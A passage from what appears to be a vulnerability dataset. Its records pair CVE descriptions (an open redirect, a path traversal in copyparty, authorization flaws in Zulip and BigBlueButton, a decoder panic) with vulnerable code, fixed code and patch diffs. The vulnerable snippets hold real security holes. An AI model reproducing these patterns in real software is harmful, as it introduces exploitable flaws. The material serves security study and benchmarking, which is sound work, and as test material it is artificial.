{\n\t\t\tcontinue\n\t\t}\n\n\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n\t\t// Therefore we should ignore these redirect locations to prevent open redirects\n\t\tif len(loc) > 1 && loc[0] == '/' && (loc[1] == '/' || loc[1] == '\\\\') {\n\t\t\tcontinue\n\t\t}\n\n\t\tu, err := url.Parse(loc)\n\t\tif err != nil || ((u.Scheme != \"\" || u.Host != \"\") && !strings.HasPrefix(strings.ToLower(loc), strings.ToLower(setting.AppURL))) {\n\t\t\tcontinue\n\t\t}\n\n\t\tctx.Redirect(loc)\n\t\treturn\n\t}\n\n\tctx.Redirect(setting.AppSubURL + \"/\")\n}"}], "fix_func": [{"id": "fix_go_98_1", "commit": "9aaaf98", "file_path": "modules/context/context_response.go", "start_line": 46, "end_line": 68, "snippet": "func (ctx *Context) RedirectToFirst(location ...string) {\n\tfor _, loc := range location {\n\t\tif len(loc) == 0 {\n\t\t\tcontinue\n\t\t}\n\n\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\", \"\\\\\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n\t\t// Therefore we should ignore these redirect locations to prevent open redirects\n\t\tif len(loc) > 1 && (loc[0] == '/' || loc[0] == '\\\\') && (loc[1] == '/' || loc[1] == '\\\\') {\n\t\t\tcontinue\n\t\t}\n\n\t\tu, err := url.Parse(loc)\n\t\tif err != nil || ((u.Scheme != \"\" || u.Host != \"\") && !strings.HasPrefix(strings.ToLower(loc), strings.ToLower(setting.AppURL))) {\n\t\t\tcontinue\n\t\t}\n\n\t\tctx.Redirect(loc)\n\t\treturn\n\t}\n\n\tctx.Redirect(setting.AppSubURL + \"/\")\n}"}], "vul_patch": "--- a/modules/context/context_response.go\n+++ b/modules/context/context_response.go\n@@ -4,9 +4,9 @@\n \t\t\tcontinue\n \t\t}\n \n-\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n+\t\t// Unfortunately browsers consider a redirect Location with preceding \"//\", \"\\\\\" and \"/\\\" as meaning redirect to \"http(s)://REST_OF_PATH\"\n \t\t// Therefore we should ignore these redirect locations to prevent open redirects\n-\t\tif len(loc) > 1 && loc[0] == '/' && (loc[1] == '/' || loc[1] == '\\\\') {\n+\t\tif len(loc) > 1 && (loc[0] == '/' || loc[0] == '\\\\') && (loc[1] == '/' || loc[1] == '\\\\') {\n \t\t\tcontinue\n \t\t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-27601", "cve_description": "In BigBlueButton before 2.2.7, lockSettingsProps.disablePrivateChat does not apply to already opened chats. This occurs in bigbluebutton-html5/imports/ui/components/chat/service.js.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/bigbluebutton/bigbluebutton", "patch_url": ["https://github.com/bigbluebutton/bigbluebutton/commit/7dcdfb191373684bafa7b11cdd0128c9869040a1"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_267_1", "commit": "a0e02932c6b00bf58bfee1ac31d8e6fa82263ee8", "file_path": "bigbluebutton-html5/imports/ui/components/chat/service.js", "start_line": 134, "end_line": 156, "snippet": "const isChatLocked = (receiverID) => {\n const isPublic = receiverID === PUBLIC_CHAT_ID;\n\n const meeting = Meetings.findOne({ meetingId: Auth.meetingID },\n { fields: { 'lockSettingsProps.disablePublicChat': 1 } });\n const user = Users.findOne({ meetingId: Auth.meetingID, userId: Auth.userID },\n { fields: { locked: 1, role: 1 } });\n const receiver = Users.findOne({ meetingId: Auth.meetingID, userId: receiverID },\n { fields: { role: 1 } });\n const isReceiverModerator = receiver && receiver.role === ROLE_MODERATOR;\n\n if (meeting.lockSettingsProps !== undefined) {\n if (user.locked && user.role !== ROLE_MODERATOR) {\n if (isPublic) {\n return meeting.lockSettingsProps.disablePublicChat;\n }\n return !isReceiverModerator\n && meeting.lockSettingsProps.disablePrivateChat;\n }\n }\n\n return false;\n};"}], "fix_func": [{"id": "fix_js_267_1", "commit": "7dcdfb191373684bafa7b11cdd0128c9869040a1", "file_path": "bigbluebutton-html5/imports/ui/components/chat/service.js", "start_line": 134, "end_line": 155, "snippet": "const isChatLocked = (receiverID) => {\n const isPublic = receiverID === PUBLIC_CHAT_ID;\n const meeting = Meetings.findOne({ meetingId: Auth.meetingID },\n { fields: { 'lockSettingsProps.disablePublicChat': 1, 'lockSettingsProps.disablePrivateChat': 1 } });\n const user = Users.findOne({ meetingId: Auth.meetingID, userId: Auth.userID },\n { fields: { locked: 1, role: 1 } });\n const receiver = Users.findOne({ meetingId: Auth.meetingID, userId: receiverID },\n { fields: { role: 1 } });\n const isReceiverModerator = receiver && receiver.role === ROLE_MODERATOR;\n\n if (meeting.lockSettingsProps !== undefined) {\n if (user.locked && user.role !== ROLE_MODERATOR) {\n if (isPublic) {\n return meeting.lockSettingsProps.disablePublicChat;\n }\n return !isReceiverModerator\n && meeting.lockSettingsProps.disablePrivateChat;\n }\n }\n\n return false;\n};"}], "vul_patch": "--- a/bigbluebutton-html5/imports/ui/components/chat/service.js\n+++ b/bigbluebutton-html5/imports/ui/components/chat/service.js\n@@ -1,8 +1,7 @@\n const isChatLocked = (receiverID) => {\n const isPublic = receiverID === PUBLIC_CHAT_ID;\n-\n const meeting = Meetings.findOne({ meetingId: Auth.meetingID },\n- { fields: { 'lockSettingsProps.disablePublicChat': 1 } });\n+ { fields: { 'lockSettingsProps.disablePublicChat': 1, 'lockSettingsProps.disablePrivateChat': 1 } });\n const user = Users.findOne({ meetingId: Auth.meetingID, userId: Auth.userID },\n { fields: { locked: 1, role: 1 } });\n const receiver = Users.findOne({ meetingId: Auth.meetingID, userId: receiverID },\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-2584", "cve_description": "The dag-pb codec can panic when decoding invalid blocks.", "cwe_info": {"CWE-119": {"name": "Improper Restriction of Operations within the Bounds of a Memory Buffer", "description": "The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data."}}, "repo": "https://github.com/ipld/go-codec-dagpb", "patch_url": ["https://github.com/ipld/go-codec-dagpb/commit/a17ace35cc760a2698645c09868f9050fa219f57"], "programing_language": "Go", "vul_func": [{"id": "vul_go_297_1", "commit": "fa6d623cbc0da39a4940da01d7506d05df80c7ad", "file_path": "unmarshal.go", "start_line": 41, "end_line": 161, "snippet": "func DecodeBytes(na ipld.NodeAssembler, src []byte) error {\n\tremaining := src\n\n\tma, err := na.BeginMap(2)\n\tif err != nil {\n\t\treturn err\n\t}\n\tvar links ipld.ListAssembler\n\n\thaveData := false\n\thaveLinks := false\n\tfor {\n\t\tif len(remaining) == 0 {\n\t\t\tbreak\n\t\t}\n\n\t\tfieldNum, wireType, n := protowire.ConsumeTag(remaining)\n\t\tif n < 0 {\n\t\t\treturn protowire.ParseError(n)\n\t\t}\n\t\tremaining = remaining[n:]\n\n\t\tif wireType != 2 {\n\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) invalid wireType, expected 2, got %d\", wireType)\n\t\t}\n\n\t\t// Note that we allow Data and Links to come in either order,\n\t\t// since the spec defines that decoding \"should\" accept either form.\n\t\t// This is for backwards compatibility with older IPFS data.\n\n\t\tswitch fieldNum {\n\t\tcase 1:\n\t\t\tif haveData {\n\t\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) duplicate Data section\")\n\t\t\t}\n\n\t\t\tchunk, n := protowire.ConsumeBytes(remaining)\n\t\t\tif n < 0 {\n\t\t\t\treturn protowire.ParseError(n)\n\t\t\t}\n\t\t\tremaining = remaining[n:]\n\n\t\t\tif links != nil {\n\t\t\t\t// Links came before Data.\n\t\t\t\t// Finish them before we start Data.\n\t\t\t\tif err := links.Finish(); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlinks = nil\n\t\t\t}\n\n\t\t\tif err := ma.AssembleKey().AssignString(\"Data\"); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := ma.AssembleValue().AssignBytes(chunk); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\thaveData = true\n\n\t\tcase 2:\n\t\t\tbytesLen, n := protowire.ConsumeVarint(remaining)\n\t\t\tif n < 0 {\n\t\t\t\treturn protowire.ParseError(n)\n\t\t\t}\n\t\t\tremaining = remaining[n:]\n\n\t\t\tif links == nil {\n\t\t\t\tif haveLinks {\n\t\t\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) duplicate Links section\")\n\t\t\t\t}\n\n\t\t\t\t// The repeated \"Links\" part begins.\n\t\t\t\tif err := ma.AssembleKey().AssignString(\"Links\"); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlinks, err = ma.AssembleValue().BeginList(0)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tcurLink, err := links.AssembleValue().BeginMap(3)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := unmarshalLink(remaining[:bytesLen], curLink); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tremaining = remaining[bytesLen:]\n\t\t\tif err := curLink.Finish(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\thaveLinks = true\n\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) invalid fieldNumber, expected 1 or 2, got %d\", fieldNum)\n\t\t}\n\t}\n\n\tif links != nil {\n\t\t// We had some links at the end, so finish them.\n\t\tif err := links.Finish(); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t} else if !haveLinks {\n\t\t// We didn't have any links.\n\t\t// Since we always want a Links field, add one here.\n\t\tif err := ma.AssembleKey().AssignString(\"Links\"); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tlinks, err := ma.AssembleValue().BeginList(0)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := links.Finish(); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn ma.Finish()\n}"}], "fix_func": [{"id": "fix_go_297_1", "commit": "a17ace35cc760a2698645c09868f9050fa219f57", "file_path": "unmarshal.go", "start_line": 41, "end_line": 160, "snippet": "func DecodeBytes(na ipld.NodeAssembler, src []byte) error {\n\tremaining := src\n\n\tma, err := na.BeginMap(2)\n\tif err != nil {\n\t\treturn err\n\t}\n\tvar links ipld.ListAssembler\n\n\thaveData := false\n\thaveLinks := false\n\tfor {\n\t\tif len(remaining) == 0 {\n\t\t\tbreak\n\t\t}\n\n\t\tfieldNum, wireType, n := protowire.ConsumeTag(remaining)\n\t\tif n < 0 {\n\t\t\treturn protowire.ParseError(n)\n\t\t}\n\t\tremaining = remaining[n:]\n\n\t\tif wireType != 2 {\n\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) invalid wireType, expected 2, got %d\", wireType)\n\t\t}\n\n\t\t// Note that we allow Data and Links to come in either order,\n\t\t// since the spec defines that decoding \"should\" accept either form.\n\t\t// This is for backwards compatibility with older IPFS data.\n\n\t\tswitch fieldNum {\n\t\tcase 1:\n\t\t\tif haveData {\n\t\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) duplicate Data section\")\n\t\t\t}\n\n\t\t\tchunk, n := protowire.ConsumeBytes(remaining)\n\t\t\tif n < 0 {\n\t\t\t\treturn protowire.ParseError(n)\n\t\t\t}\n\t\t\tremaining = remaining[n:]\n\n\t\t\tif links != nil {\n\t\t\t\t// Links came before Data.\n\t\t\t\t// Finish them before we start Data.\n\t\t\t\tif err := links.Finish(); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlinks = nil\n\t\t\t}\n\n\t\t\tif err := ma.AssembleKey().AssignString(\"Data\"); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := ma.AssembleValue().AssignBytes(chunk); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\thaveData = true\n\n\t\tcase 2:\n\t\t\tchunk, n := protowire.ConsumeBytes(remaining)\n\t\t\tif n < 0 {\n\t\t\t\treturn protowire.ParseError(n)\n\t\t\t}\n\t\t\tremaining = remaining[n:]\n\n\t\t\tif links == nil {\n\t\t\t\tif haveLinks {\n\t\t\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) duplicate Links section\")\n\t\t\t\t}\n\n\t\t\t\t// The repeated \"Links\" part begins.\n\t\t\t\tif err := ma.AssembleKey().AssignString(\"Links\"); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlinks, err = ma.AssembleValue().BeginList(0)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tcurLink, err := links.AssembleValue().BeginMap(3)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := unmarshalLink(chunk, curLink); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err := curLink.Finish(); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\thaveLinks = true\n\n\t\tdefault:\n\t\t\treturn fmt.Errorf(\"protobuf: (PBNode) invalid fieldNumber, expected 1 or 2, got %d\", fieldNum)\n\t\t}\n\t}\n\n\tif links != nil {\n\t\t// We had some links at the end, so finish them.\n\t\tif err := links.Finish(); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t} else if !haveLinks {\n\t\t// We didn't have any links.\n\t\t// Since we always want a Links field, add one here.\n\t\tif err := ma.AssembleKey().AssignString(\"Links\"); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tlinks, err := ma.AssembleValue().BeginList(0)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := links.Finish(); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn ma.Finish()\n}"}], "vul_patch": "--- a/unmarshal.go\n+++ b/unmarshal.go\n@@ -58,7 +58,7 @@\n \t\t\thaveData = true\n \n \t\tcase 2:\n-\t\t\tbytesLen, n := protowire.ConsumeVarint(remaining)\n+\t\t\tchunk, n := protowire.ConsumeBytes(remaining)\n \t\t\tif n < 0 {\n \t\t\t\treturn protowire.ParseError(n)\n \t\t\t}\n@@ -83,10 +83,9 @@\n \t\t\tif err != nil {\n \t\t\t\treturn err\n \t\t\t}\n-\t\t\tif err := unmarshalLink(remaining[:bytesLen], curLink); err != nil {\n+\t\t\tif err := unmarshalLink(chunk, curLink); err != nil {\n \t\t\t\treturn err\n \t\t\t}\n-\t\t\tremaining = remaining[bytesLen:]\n \t\t\tif err := curLink.Finish(); err != nil {\n \t\t\t\treturn err\n \t\t\t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0613", "cve_description": "Authorization Bypass Through User-Controlled Key in NPM urijs prior to 1.19.8.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/medialize/uri.js", "patch_url": ["https://github.com/medialize/uri.js/commit/6ea641cc8648b025ed5f30b090c2abd4d1a5249f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_156_1", "commit": "19e54c7", "file_path": "src/URI.js", "start_line": 490, "end_line": 549, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/, '$1://');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "fix_func": [{"id": "fix_js_156_1", "commit": "6ea641c", "file_path": "src/URI.js", "start_line": 490, "end_line": 549, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/i, '$1://');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "vul_patch": "--- a/src/URI.js\n+++ b/src/URI.js\n@@ -24,7 +24,7 @@\n }\n \n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n- string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/, '$1://');\n+ string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/i, '$1://');\n \n // extract protocol\n if (string.substring(0, 2) === '//') {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-0881", "cve_description": "An error in the implementation of an autosubscribe feature in the check_stream_exists route of the Zulip group chat application server before 1.4.3 allowed an authenticated user to subscribe to a private stream that should have required an invitation from an existing member to join. The issue affects all previously released versions of the Zulip server.", "cwe_info": {"CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/zulip/zulip", "patch_url": ["https://github.com/zulip/zulip/commit/7ecda1ac8e26d8fb3725e954b2dc4723dda2255f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_354_1", "commit": "7e0ce22808f70793ba1aeab6da46c539296cdec7", "file_path": "zerver/views/streams.py", "start_line": 475, "end_line": 491, "snippet": "def stream_exists_backend(request, user_profile, stream_id, autosubscribe):\n # type: (HttpRequest, UserProfile, int, bool) -> HttpResponse\n try:\n stream = get_and_validate_stream_by_id(stream_id, user_profile.realm)\n except JsonableError:\n stream = None\n result = {\"exists\": bool(stream)}\n if stream is not None:\n recipient = get_recipient(Recipient.STREAM, stream.id)\n if autosubscribe:\n bulk_add_subscriptions([stream], [user_profile])\n result[\"subscribed\"] = is_active_subscriber(\n user_profile=user_profile,\n recipient=recipient)\n\n return json_success(result) # results are ignored for HEAD requests\n return json_response(data=result, status=404)"}], "fix_func": [{"id": "fix_py_354_1", "commit": "7ecda1ac8e26d8fb3725e954b2dc4723dda2255f", "file_path": "zerver/views/streams.py", "start_line": 475, "end_line": 491, "snippet": "def stream_exists_backend(request, user_profile, stream_id, autosubscribe):\n # type: (HttpRequest, UserProfile, int, bool) -> HttpResponse\n try:\n stream = get_and_validate_stream_by_id(stream_id, user_profile.realm)\n except JsonableError:\n stream = None\n result = {\"exists\": bool(stream)}\n if stream is not None:\n recipient = get_recipient(Recipient.STREAM, stream.id)\n if not stream.invite_only and autosubscribe:\n bulk_add_subscriptions([stream], [user_profile])\n result[\"subscribed\"] = is_active_subscriber(\n user_profile=user_profile,\n recipient=recipient)\n\n return json_success(result) # results are ignored for HEAD requests\n return json_response(data=result, status=404)"}], "vul_patch": "--- a/zerver/views/streams.py\n+++ b/zerver/views/streams.py\n@@ -7,7 +7,7 @@\n result = {\"exists\": bool(stream)}\n if stream is not None:\n recipient = get_recipient(Recipient.STREAM, stream.id)\n- if autosubscribe:\n+ if not stream.invite_only and autosubscribe:\n bulk_add_subscriptions([stream], [user_profile])\n result[\"subscribed\"] = is_active_subscriber(\n user_profile=user_profile,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-37474", "cve_description": "Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/9001/copyparty", "patch_url": ["https://github.com/9001/copyparty/commit/043e3c7dd683113e2b1c15cacb9c8e68f76513ff"], "programing_language": "Python", "vul_func": [{"id": "vul_py_216_1", "commit": "8f59afb", "file_path": "copyparty/httpcli.py", "start_line": 751, "end_line": 864, "snippet": " def handle_get(self) -> bool:\n if self.do_log:\n logmsg = \"%-4s %s @%s\" % (self.mode, self.req, self.uname)\n\n if \"range\" in self.headers:\n try:\n rval = self.headers[\"range\"].split(\"=\", 1)[1]\n except:\n rval = self.headers[\"range\"]\n\n logmsg += \" [\\033[36m\" + rval + \"\\033[0m]\"\n\n self.log(logmsg)\n\n # \"embedded\" resources\n if self.vpath.startswith(\".cpr\"):\n if self.vpath.startswith(\".cpr/ico/\"):\n return self.tx_ico(self.vpath.split(\"/\")[-1], exact=True)\n\n if self.vpath.startswith(\".cpr/ssdp\"):\n return self.conn.hsrv.ssdp.reply(self)\n\n if self.vpath.startswith(\".cpr/dd/\") and self.args.mpmc:\n if self.args.mpmc == \".\":\n raise Pebkac(404)\n\n loc = self.args.mpmc.rstrip(\"/\") + self.vpath[self.vpath.rfind(\"/\") :]\n h = {\"Location\": loc, \"Cache-Control\": \"max-age=39\"}\n self.reply(b\"\", 301, headers=h)\n return True\n\n static_path = os.path.join(self.E.mod, \"web/\", self.vpath[5:])\n return self.tx_file(static_path)\n\n if \"cf_challenge\" in self.uparam:\n self.reply(self.j2s(\"cf\").encode(\"utf-8\", \"replace\"))\n return True\n\n if not self.can_read and not self.can_write and not self.can_get:\n t = \"@{} has no access to [{}]\"\n self.log(t.format(self.uname, self.vpath))\n\n if \"on403\" in self.vn.flags:\n ret = self.on40x(self.vn.flags[\"on403\"], self.vn, self.rem)\n if ret == \"true\":\n return True\n elif ret == \"false\":\n return False\n elif ret == \"allow\":\n self.log(\"plugin override; access permitted\")\n self.can_read = self.can_write = self.can_move = True\n self.can_delete = self.can_get = self.can_upget = True\n self.can_admin = True\n else:\n return self.tx_404(True)\n else:\n if self.vpath:\n return self.tx_404(True)\n\n self.uparam[\"h\"] = \"\"\n\n if \"tree\" in self.uparam:\n return self.tx_tree()\n\n if \"scan\" in self.uparam:\n return self.scanvol()\n\n if self.args.getmod:\n if \"delete\" in self.uparam:\n return self.handle_rm([])\n\n if \"move\" in self.uparam:\n return self.handle_mv()\n\n if not self.vpath:\n if \"reload\" in self.uparam:\n return self.handle_reload()\n\n if \"stack\" in self.uparam:\n return self.tx_stack()\n\n if \"ups\" in self.uparam:\n return self.tx_ups()\n\n if \"k304\" in self.uparam:\n return self.set_k304()\n\n if \"setck\" in self.uparam:\n return self.setck()\n\n if \"reset\" in self.uparam:\n return self.set_cfg_reset()\n\n if \"hc\" in self.uparam:\n return self.tx_svcs()\n\n if \"h\" in self.uparam:\n return self.tx_mounts()\n\n # conditional redirect to single volumes\n if self.vpath == \"\" and not self.ouparam:\n nread = len(self.rvol)\n nwrite = len(self.wvol)\n if nread + nwrite == 1 or (self.rvol == self.wvol and nread == 1):\n if nread == 1:\n vpath = self.rvol[0]\n else:\n vpath = self.wvol[0]\n\n if self.vpath != vpath:\n self.redirect(vpath, flavor=\"redirecting to\", use302=True)\n return True\n\n return self.tx_browser()"}], "fix_func": [{"id": "fix_py_216_1", "commit": "043e3c7", "file_path": "copyparty/httpcli.py", "start_line": 752, "end_line": 872, "snippet": " def handle_get(self) -> bool:\n if self.do_log:\n logmsg = \"%-4s %s @%s\" % (self.mode, self.req, self.uname)\n\n if \"range\" in self.headers:\n try:\n rval = self.headers[\"range\"].split(\"=\", 1)[1]\n except:\n rval = self.headers[\"range\"]\n\n logmsg += \" [\\033[36m\" + rval + \"\\033[0m]\"\n\n self.log(logmsg)\n\n # \"embedded\" resources\n if self.vpath.startswith(\".cpr\"):\n if self.vpath.startswith(\".cpr/ico/\"):\n return self.tx_ico(self.vpath.split(\"/\")[-1], exact=True)\n\n if self.vpath.startswith(\".cpr/ssdp\"):\n return self.conn.hsrv.ssdp.reply(self)\n\n if self.vpath.startswith(\".cpr/dd/\") and self.args.mpmc:\n if self.args.mpmc == \".\":\n raise Pebkac(404)\n\n loc = self.args.mpmc.rstrip(\"/\") + self.vpath[self.vpath.rfind(\"/\") :]\n h = {\"Location\": loc, \"Cache-Control\": \"max-age=39\"}\n self.reply(b\"\", 301, headers=h)\n return True\n\n path_base = os.path.join(self.E.mod, \"web\")\n static_path = absreal(os.path.join(path_base, self.vpath[5:]))\n if not static_path.startswith(path_base):\n t = \"attempted path traversal [{}] => [{}]\"\n self.log(t.format(self.vpath, static_path), 1)\n self.tx_404()\n return False\n\n return self.tx_file(static_path)\n\n if \"cf_challenge\" in self.uparam:\n self.reply(self.j2s(\"cf\").encode(\"utf-8\", \"replace\"))\n return True\n\n if not self.can_read and not self.can_write and not self.can_get:\n t = \"@{} has no access to [{}]\"\n self.log(t.format(self.uname, self.vpath))\n\n if \"on403\" in self.vn.flags:\n ret = self.on40x(self.vn.flags[\"on403\"], self.vn, self.rem)\n if ret == \"true\":\n return True\n elif ret == \"false\":\n return False\n elif ret == \"allow\":\n self.log(\"plugin override; access permitted\")\n self.can_read = self.can_write = self.can_move = True\n self.can_delete = self.can_get = self.can_upget = True\n self.can_admin = True\n else:\n return self.tx_404(True)\n else:\n if self.vpath:\n return self.tx_404(True)\n\n self.uparam[\"h\"] = \"\"\n\n if \"tree\" in self.uparam:\n return self.tx_tree()\n\n if \"scan\" in self.uparam:\n return self.scanvol()\n\n if self.args.getmod:\n if \"delete\" in self.uparam:\n return self.handle_rm([])\n\n if \"move\" in self.uparam:\n return self.handle_mv()\n\n if not self.vpath:\n if \"reload\" in self.uparam:\n return self.handle_reload()\n\n if \"stack\" in self.uparam:\n return self.tx_stack()\n\n if \"ups\" in self.uparam:\n return self.tx_ups()\n\n if \"k304\" in self.uparam:\n return self.set_k304()\n\n if \"setck\" in self.uparam:\n return self.setck()\n\n if \"reset\" in self.uparam:\n return self.set_cfg_reset()\n\n if \"hc\" in self.uparam:\n return self.tx_svcs()\n\n if \"h\" in self.uparam:\n return self.tx_mounts()\n\n # conditional redirect to single volumes\n if self.vpath == \"\" and not self.ouparam:\n nread = len(self.rvol)\n nwrite = len(self.wvol)\n if nread + nwrite == 1 or (self.rvol == self.wvol and nread == 1):\n if nread == 1:\n vpath = self.rvol[0]\n else:\n vpath = self.wvol[0]\n\n if self.vpath != vpath:\n self.redirect(vpath, flavor=\"redirecting to\", use302=True)\n return True\n\n return self.tx_browser()"}], "vul_patch": "--- a/copyparty/httpcli.py\n+++ b/copyparty/httpcli.py\n@@ -29,7 +29,14 @@\n self.reply(b\"\", 301, headers=h)\n return True\n \n- static_path = os.path.join(self.E.mod, \"web/\", self.vpath[5:])\n+ path_base = os.path.join(self.E.mod, \"web\")\n+ static_path = absreal(os.path.join(path_base, self.vpath[5:]))\n+ if not static_path.startswith(path_base):\n+ t = \"attempted path traversal [{}] => [{}]\"\n+ self.log(t.format(self.vpath, static_path), 1)\n+ self.tx_404()\n+ return False\n+\n return self.tx_file(static_path)\n \n if \"cf_challenge\" in self.uparam:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-28923", "cve_description": "Caddy v2.4.6 was discovered to 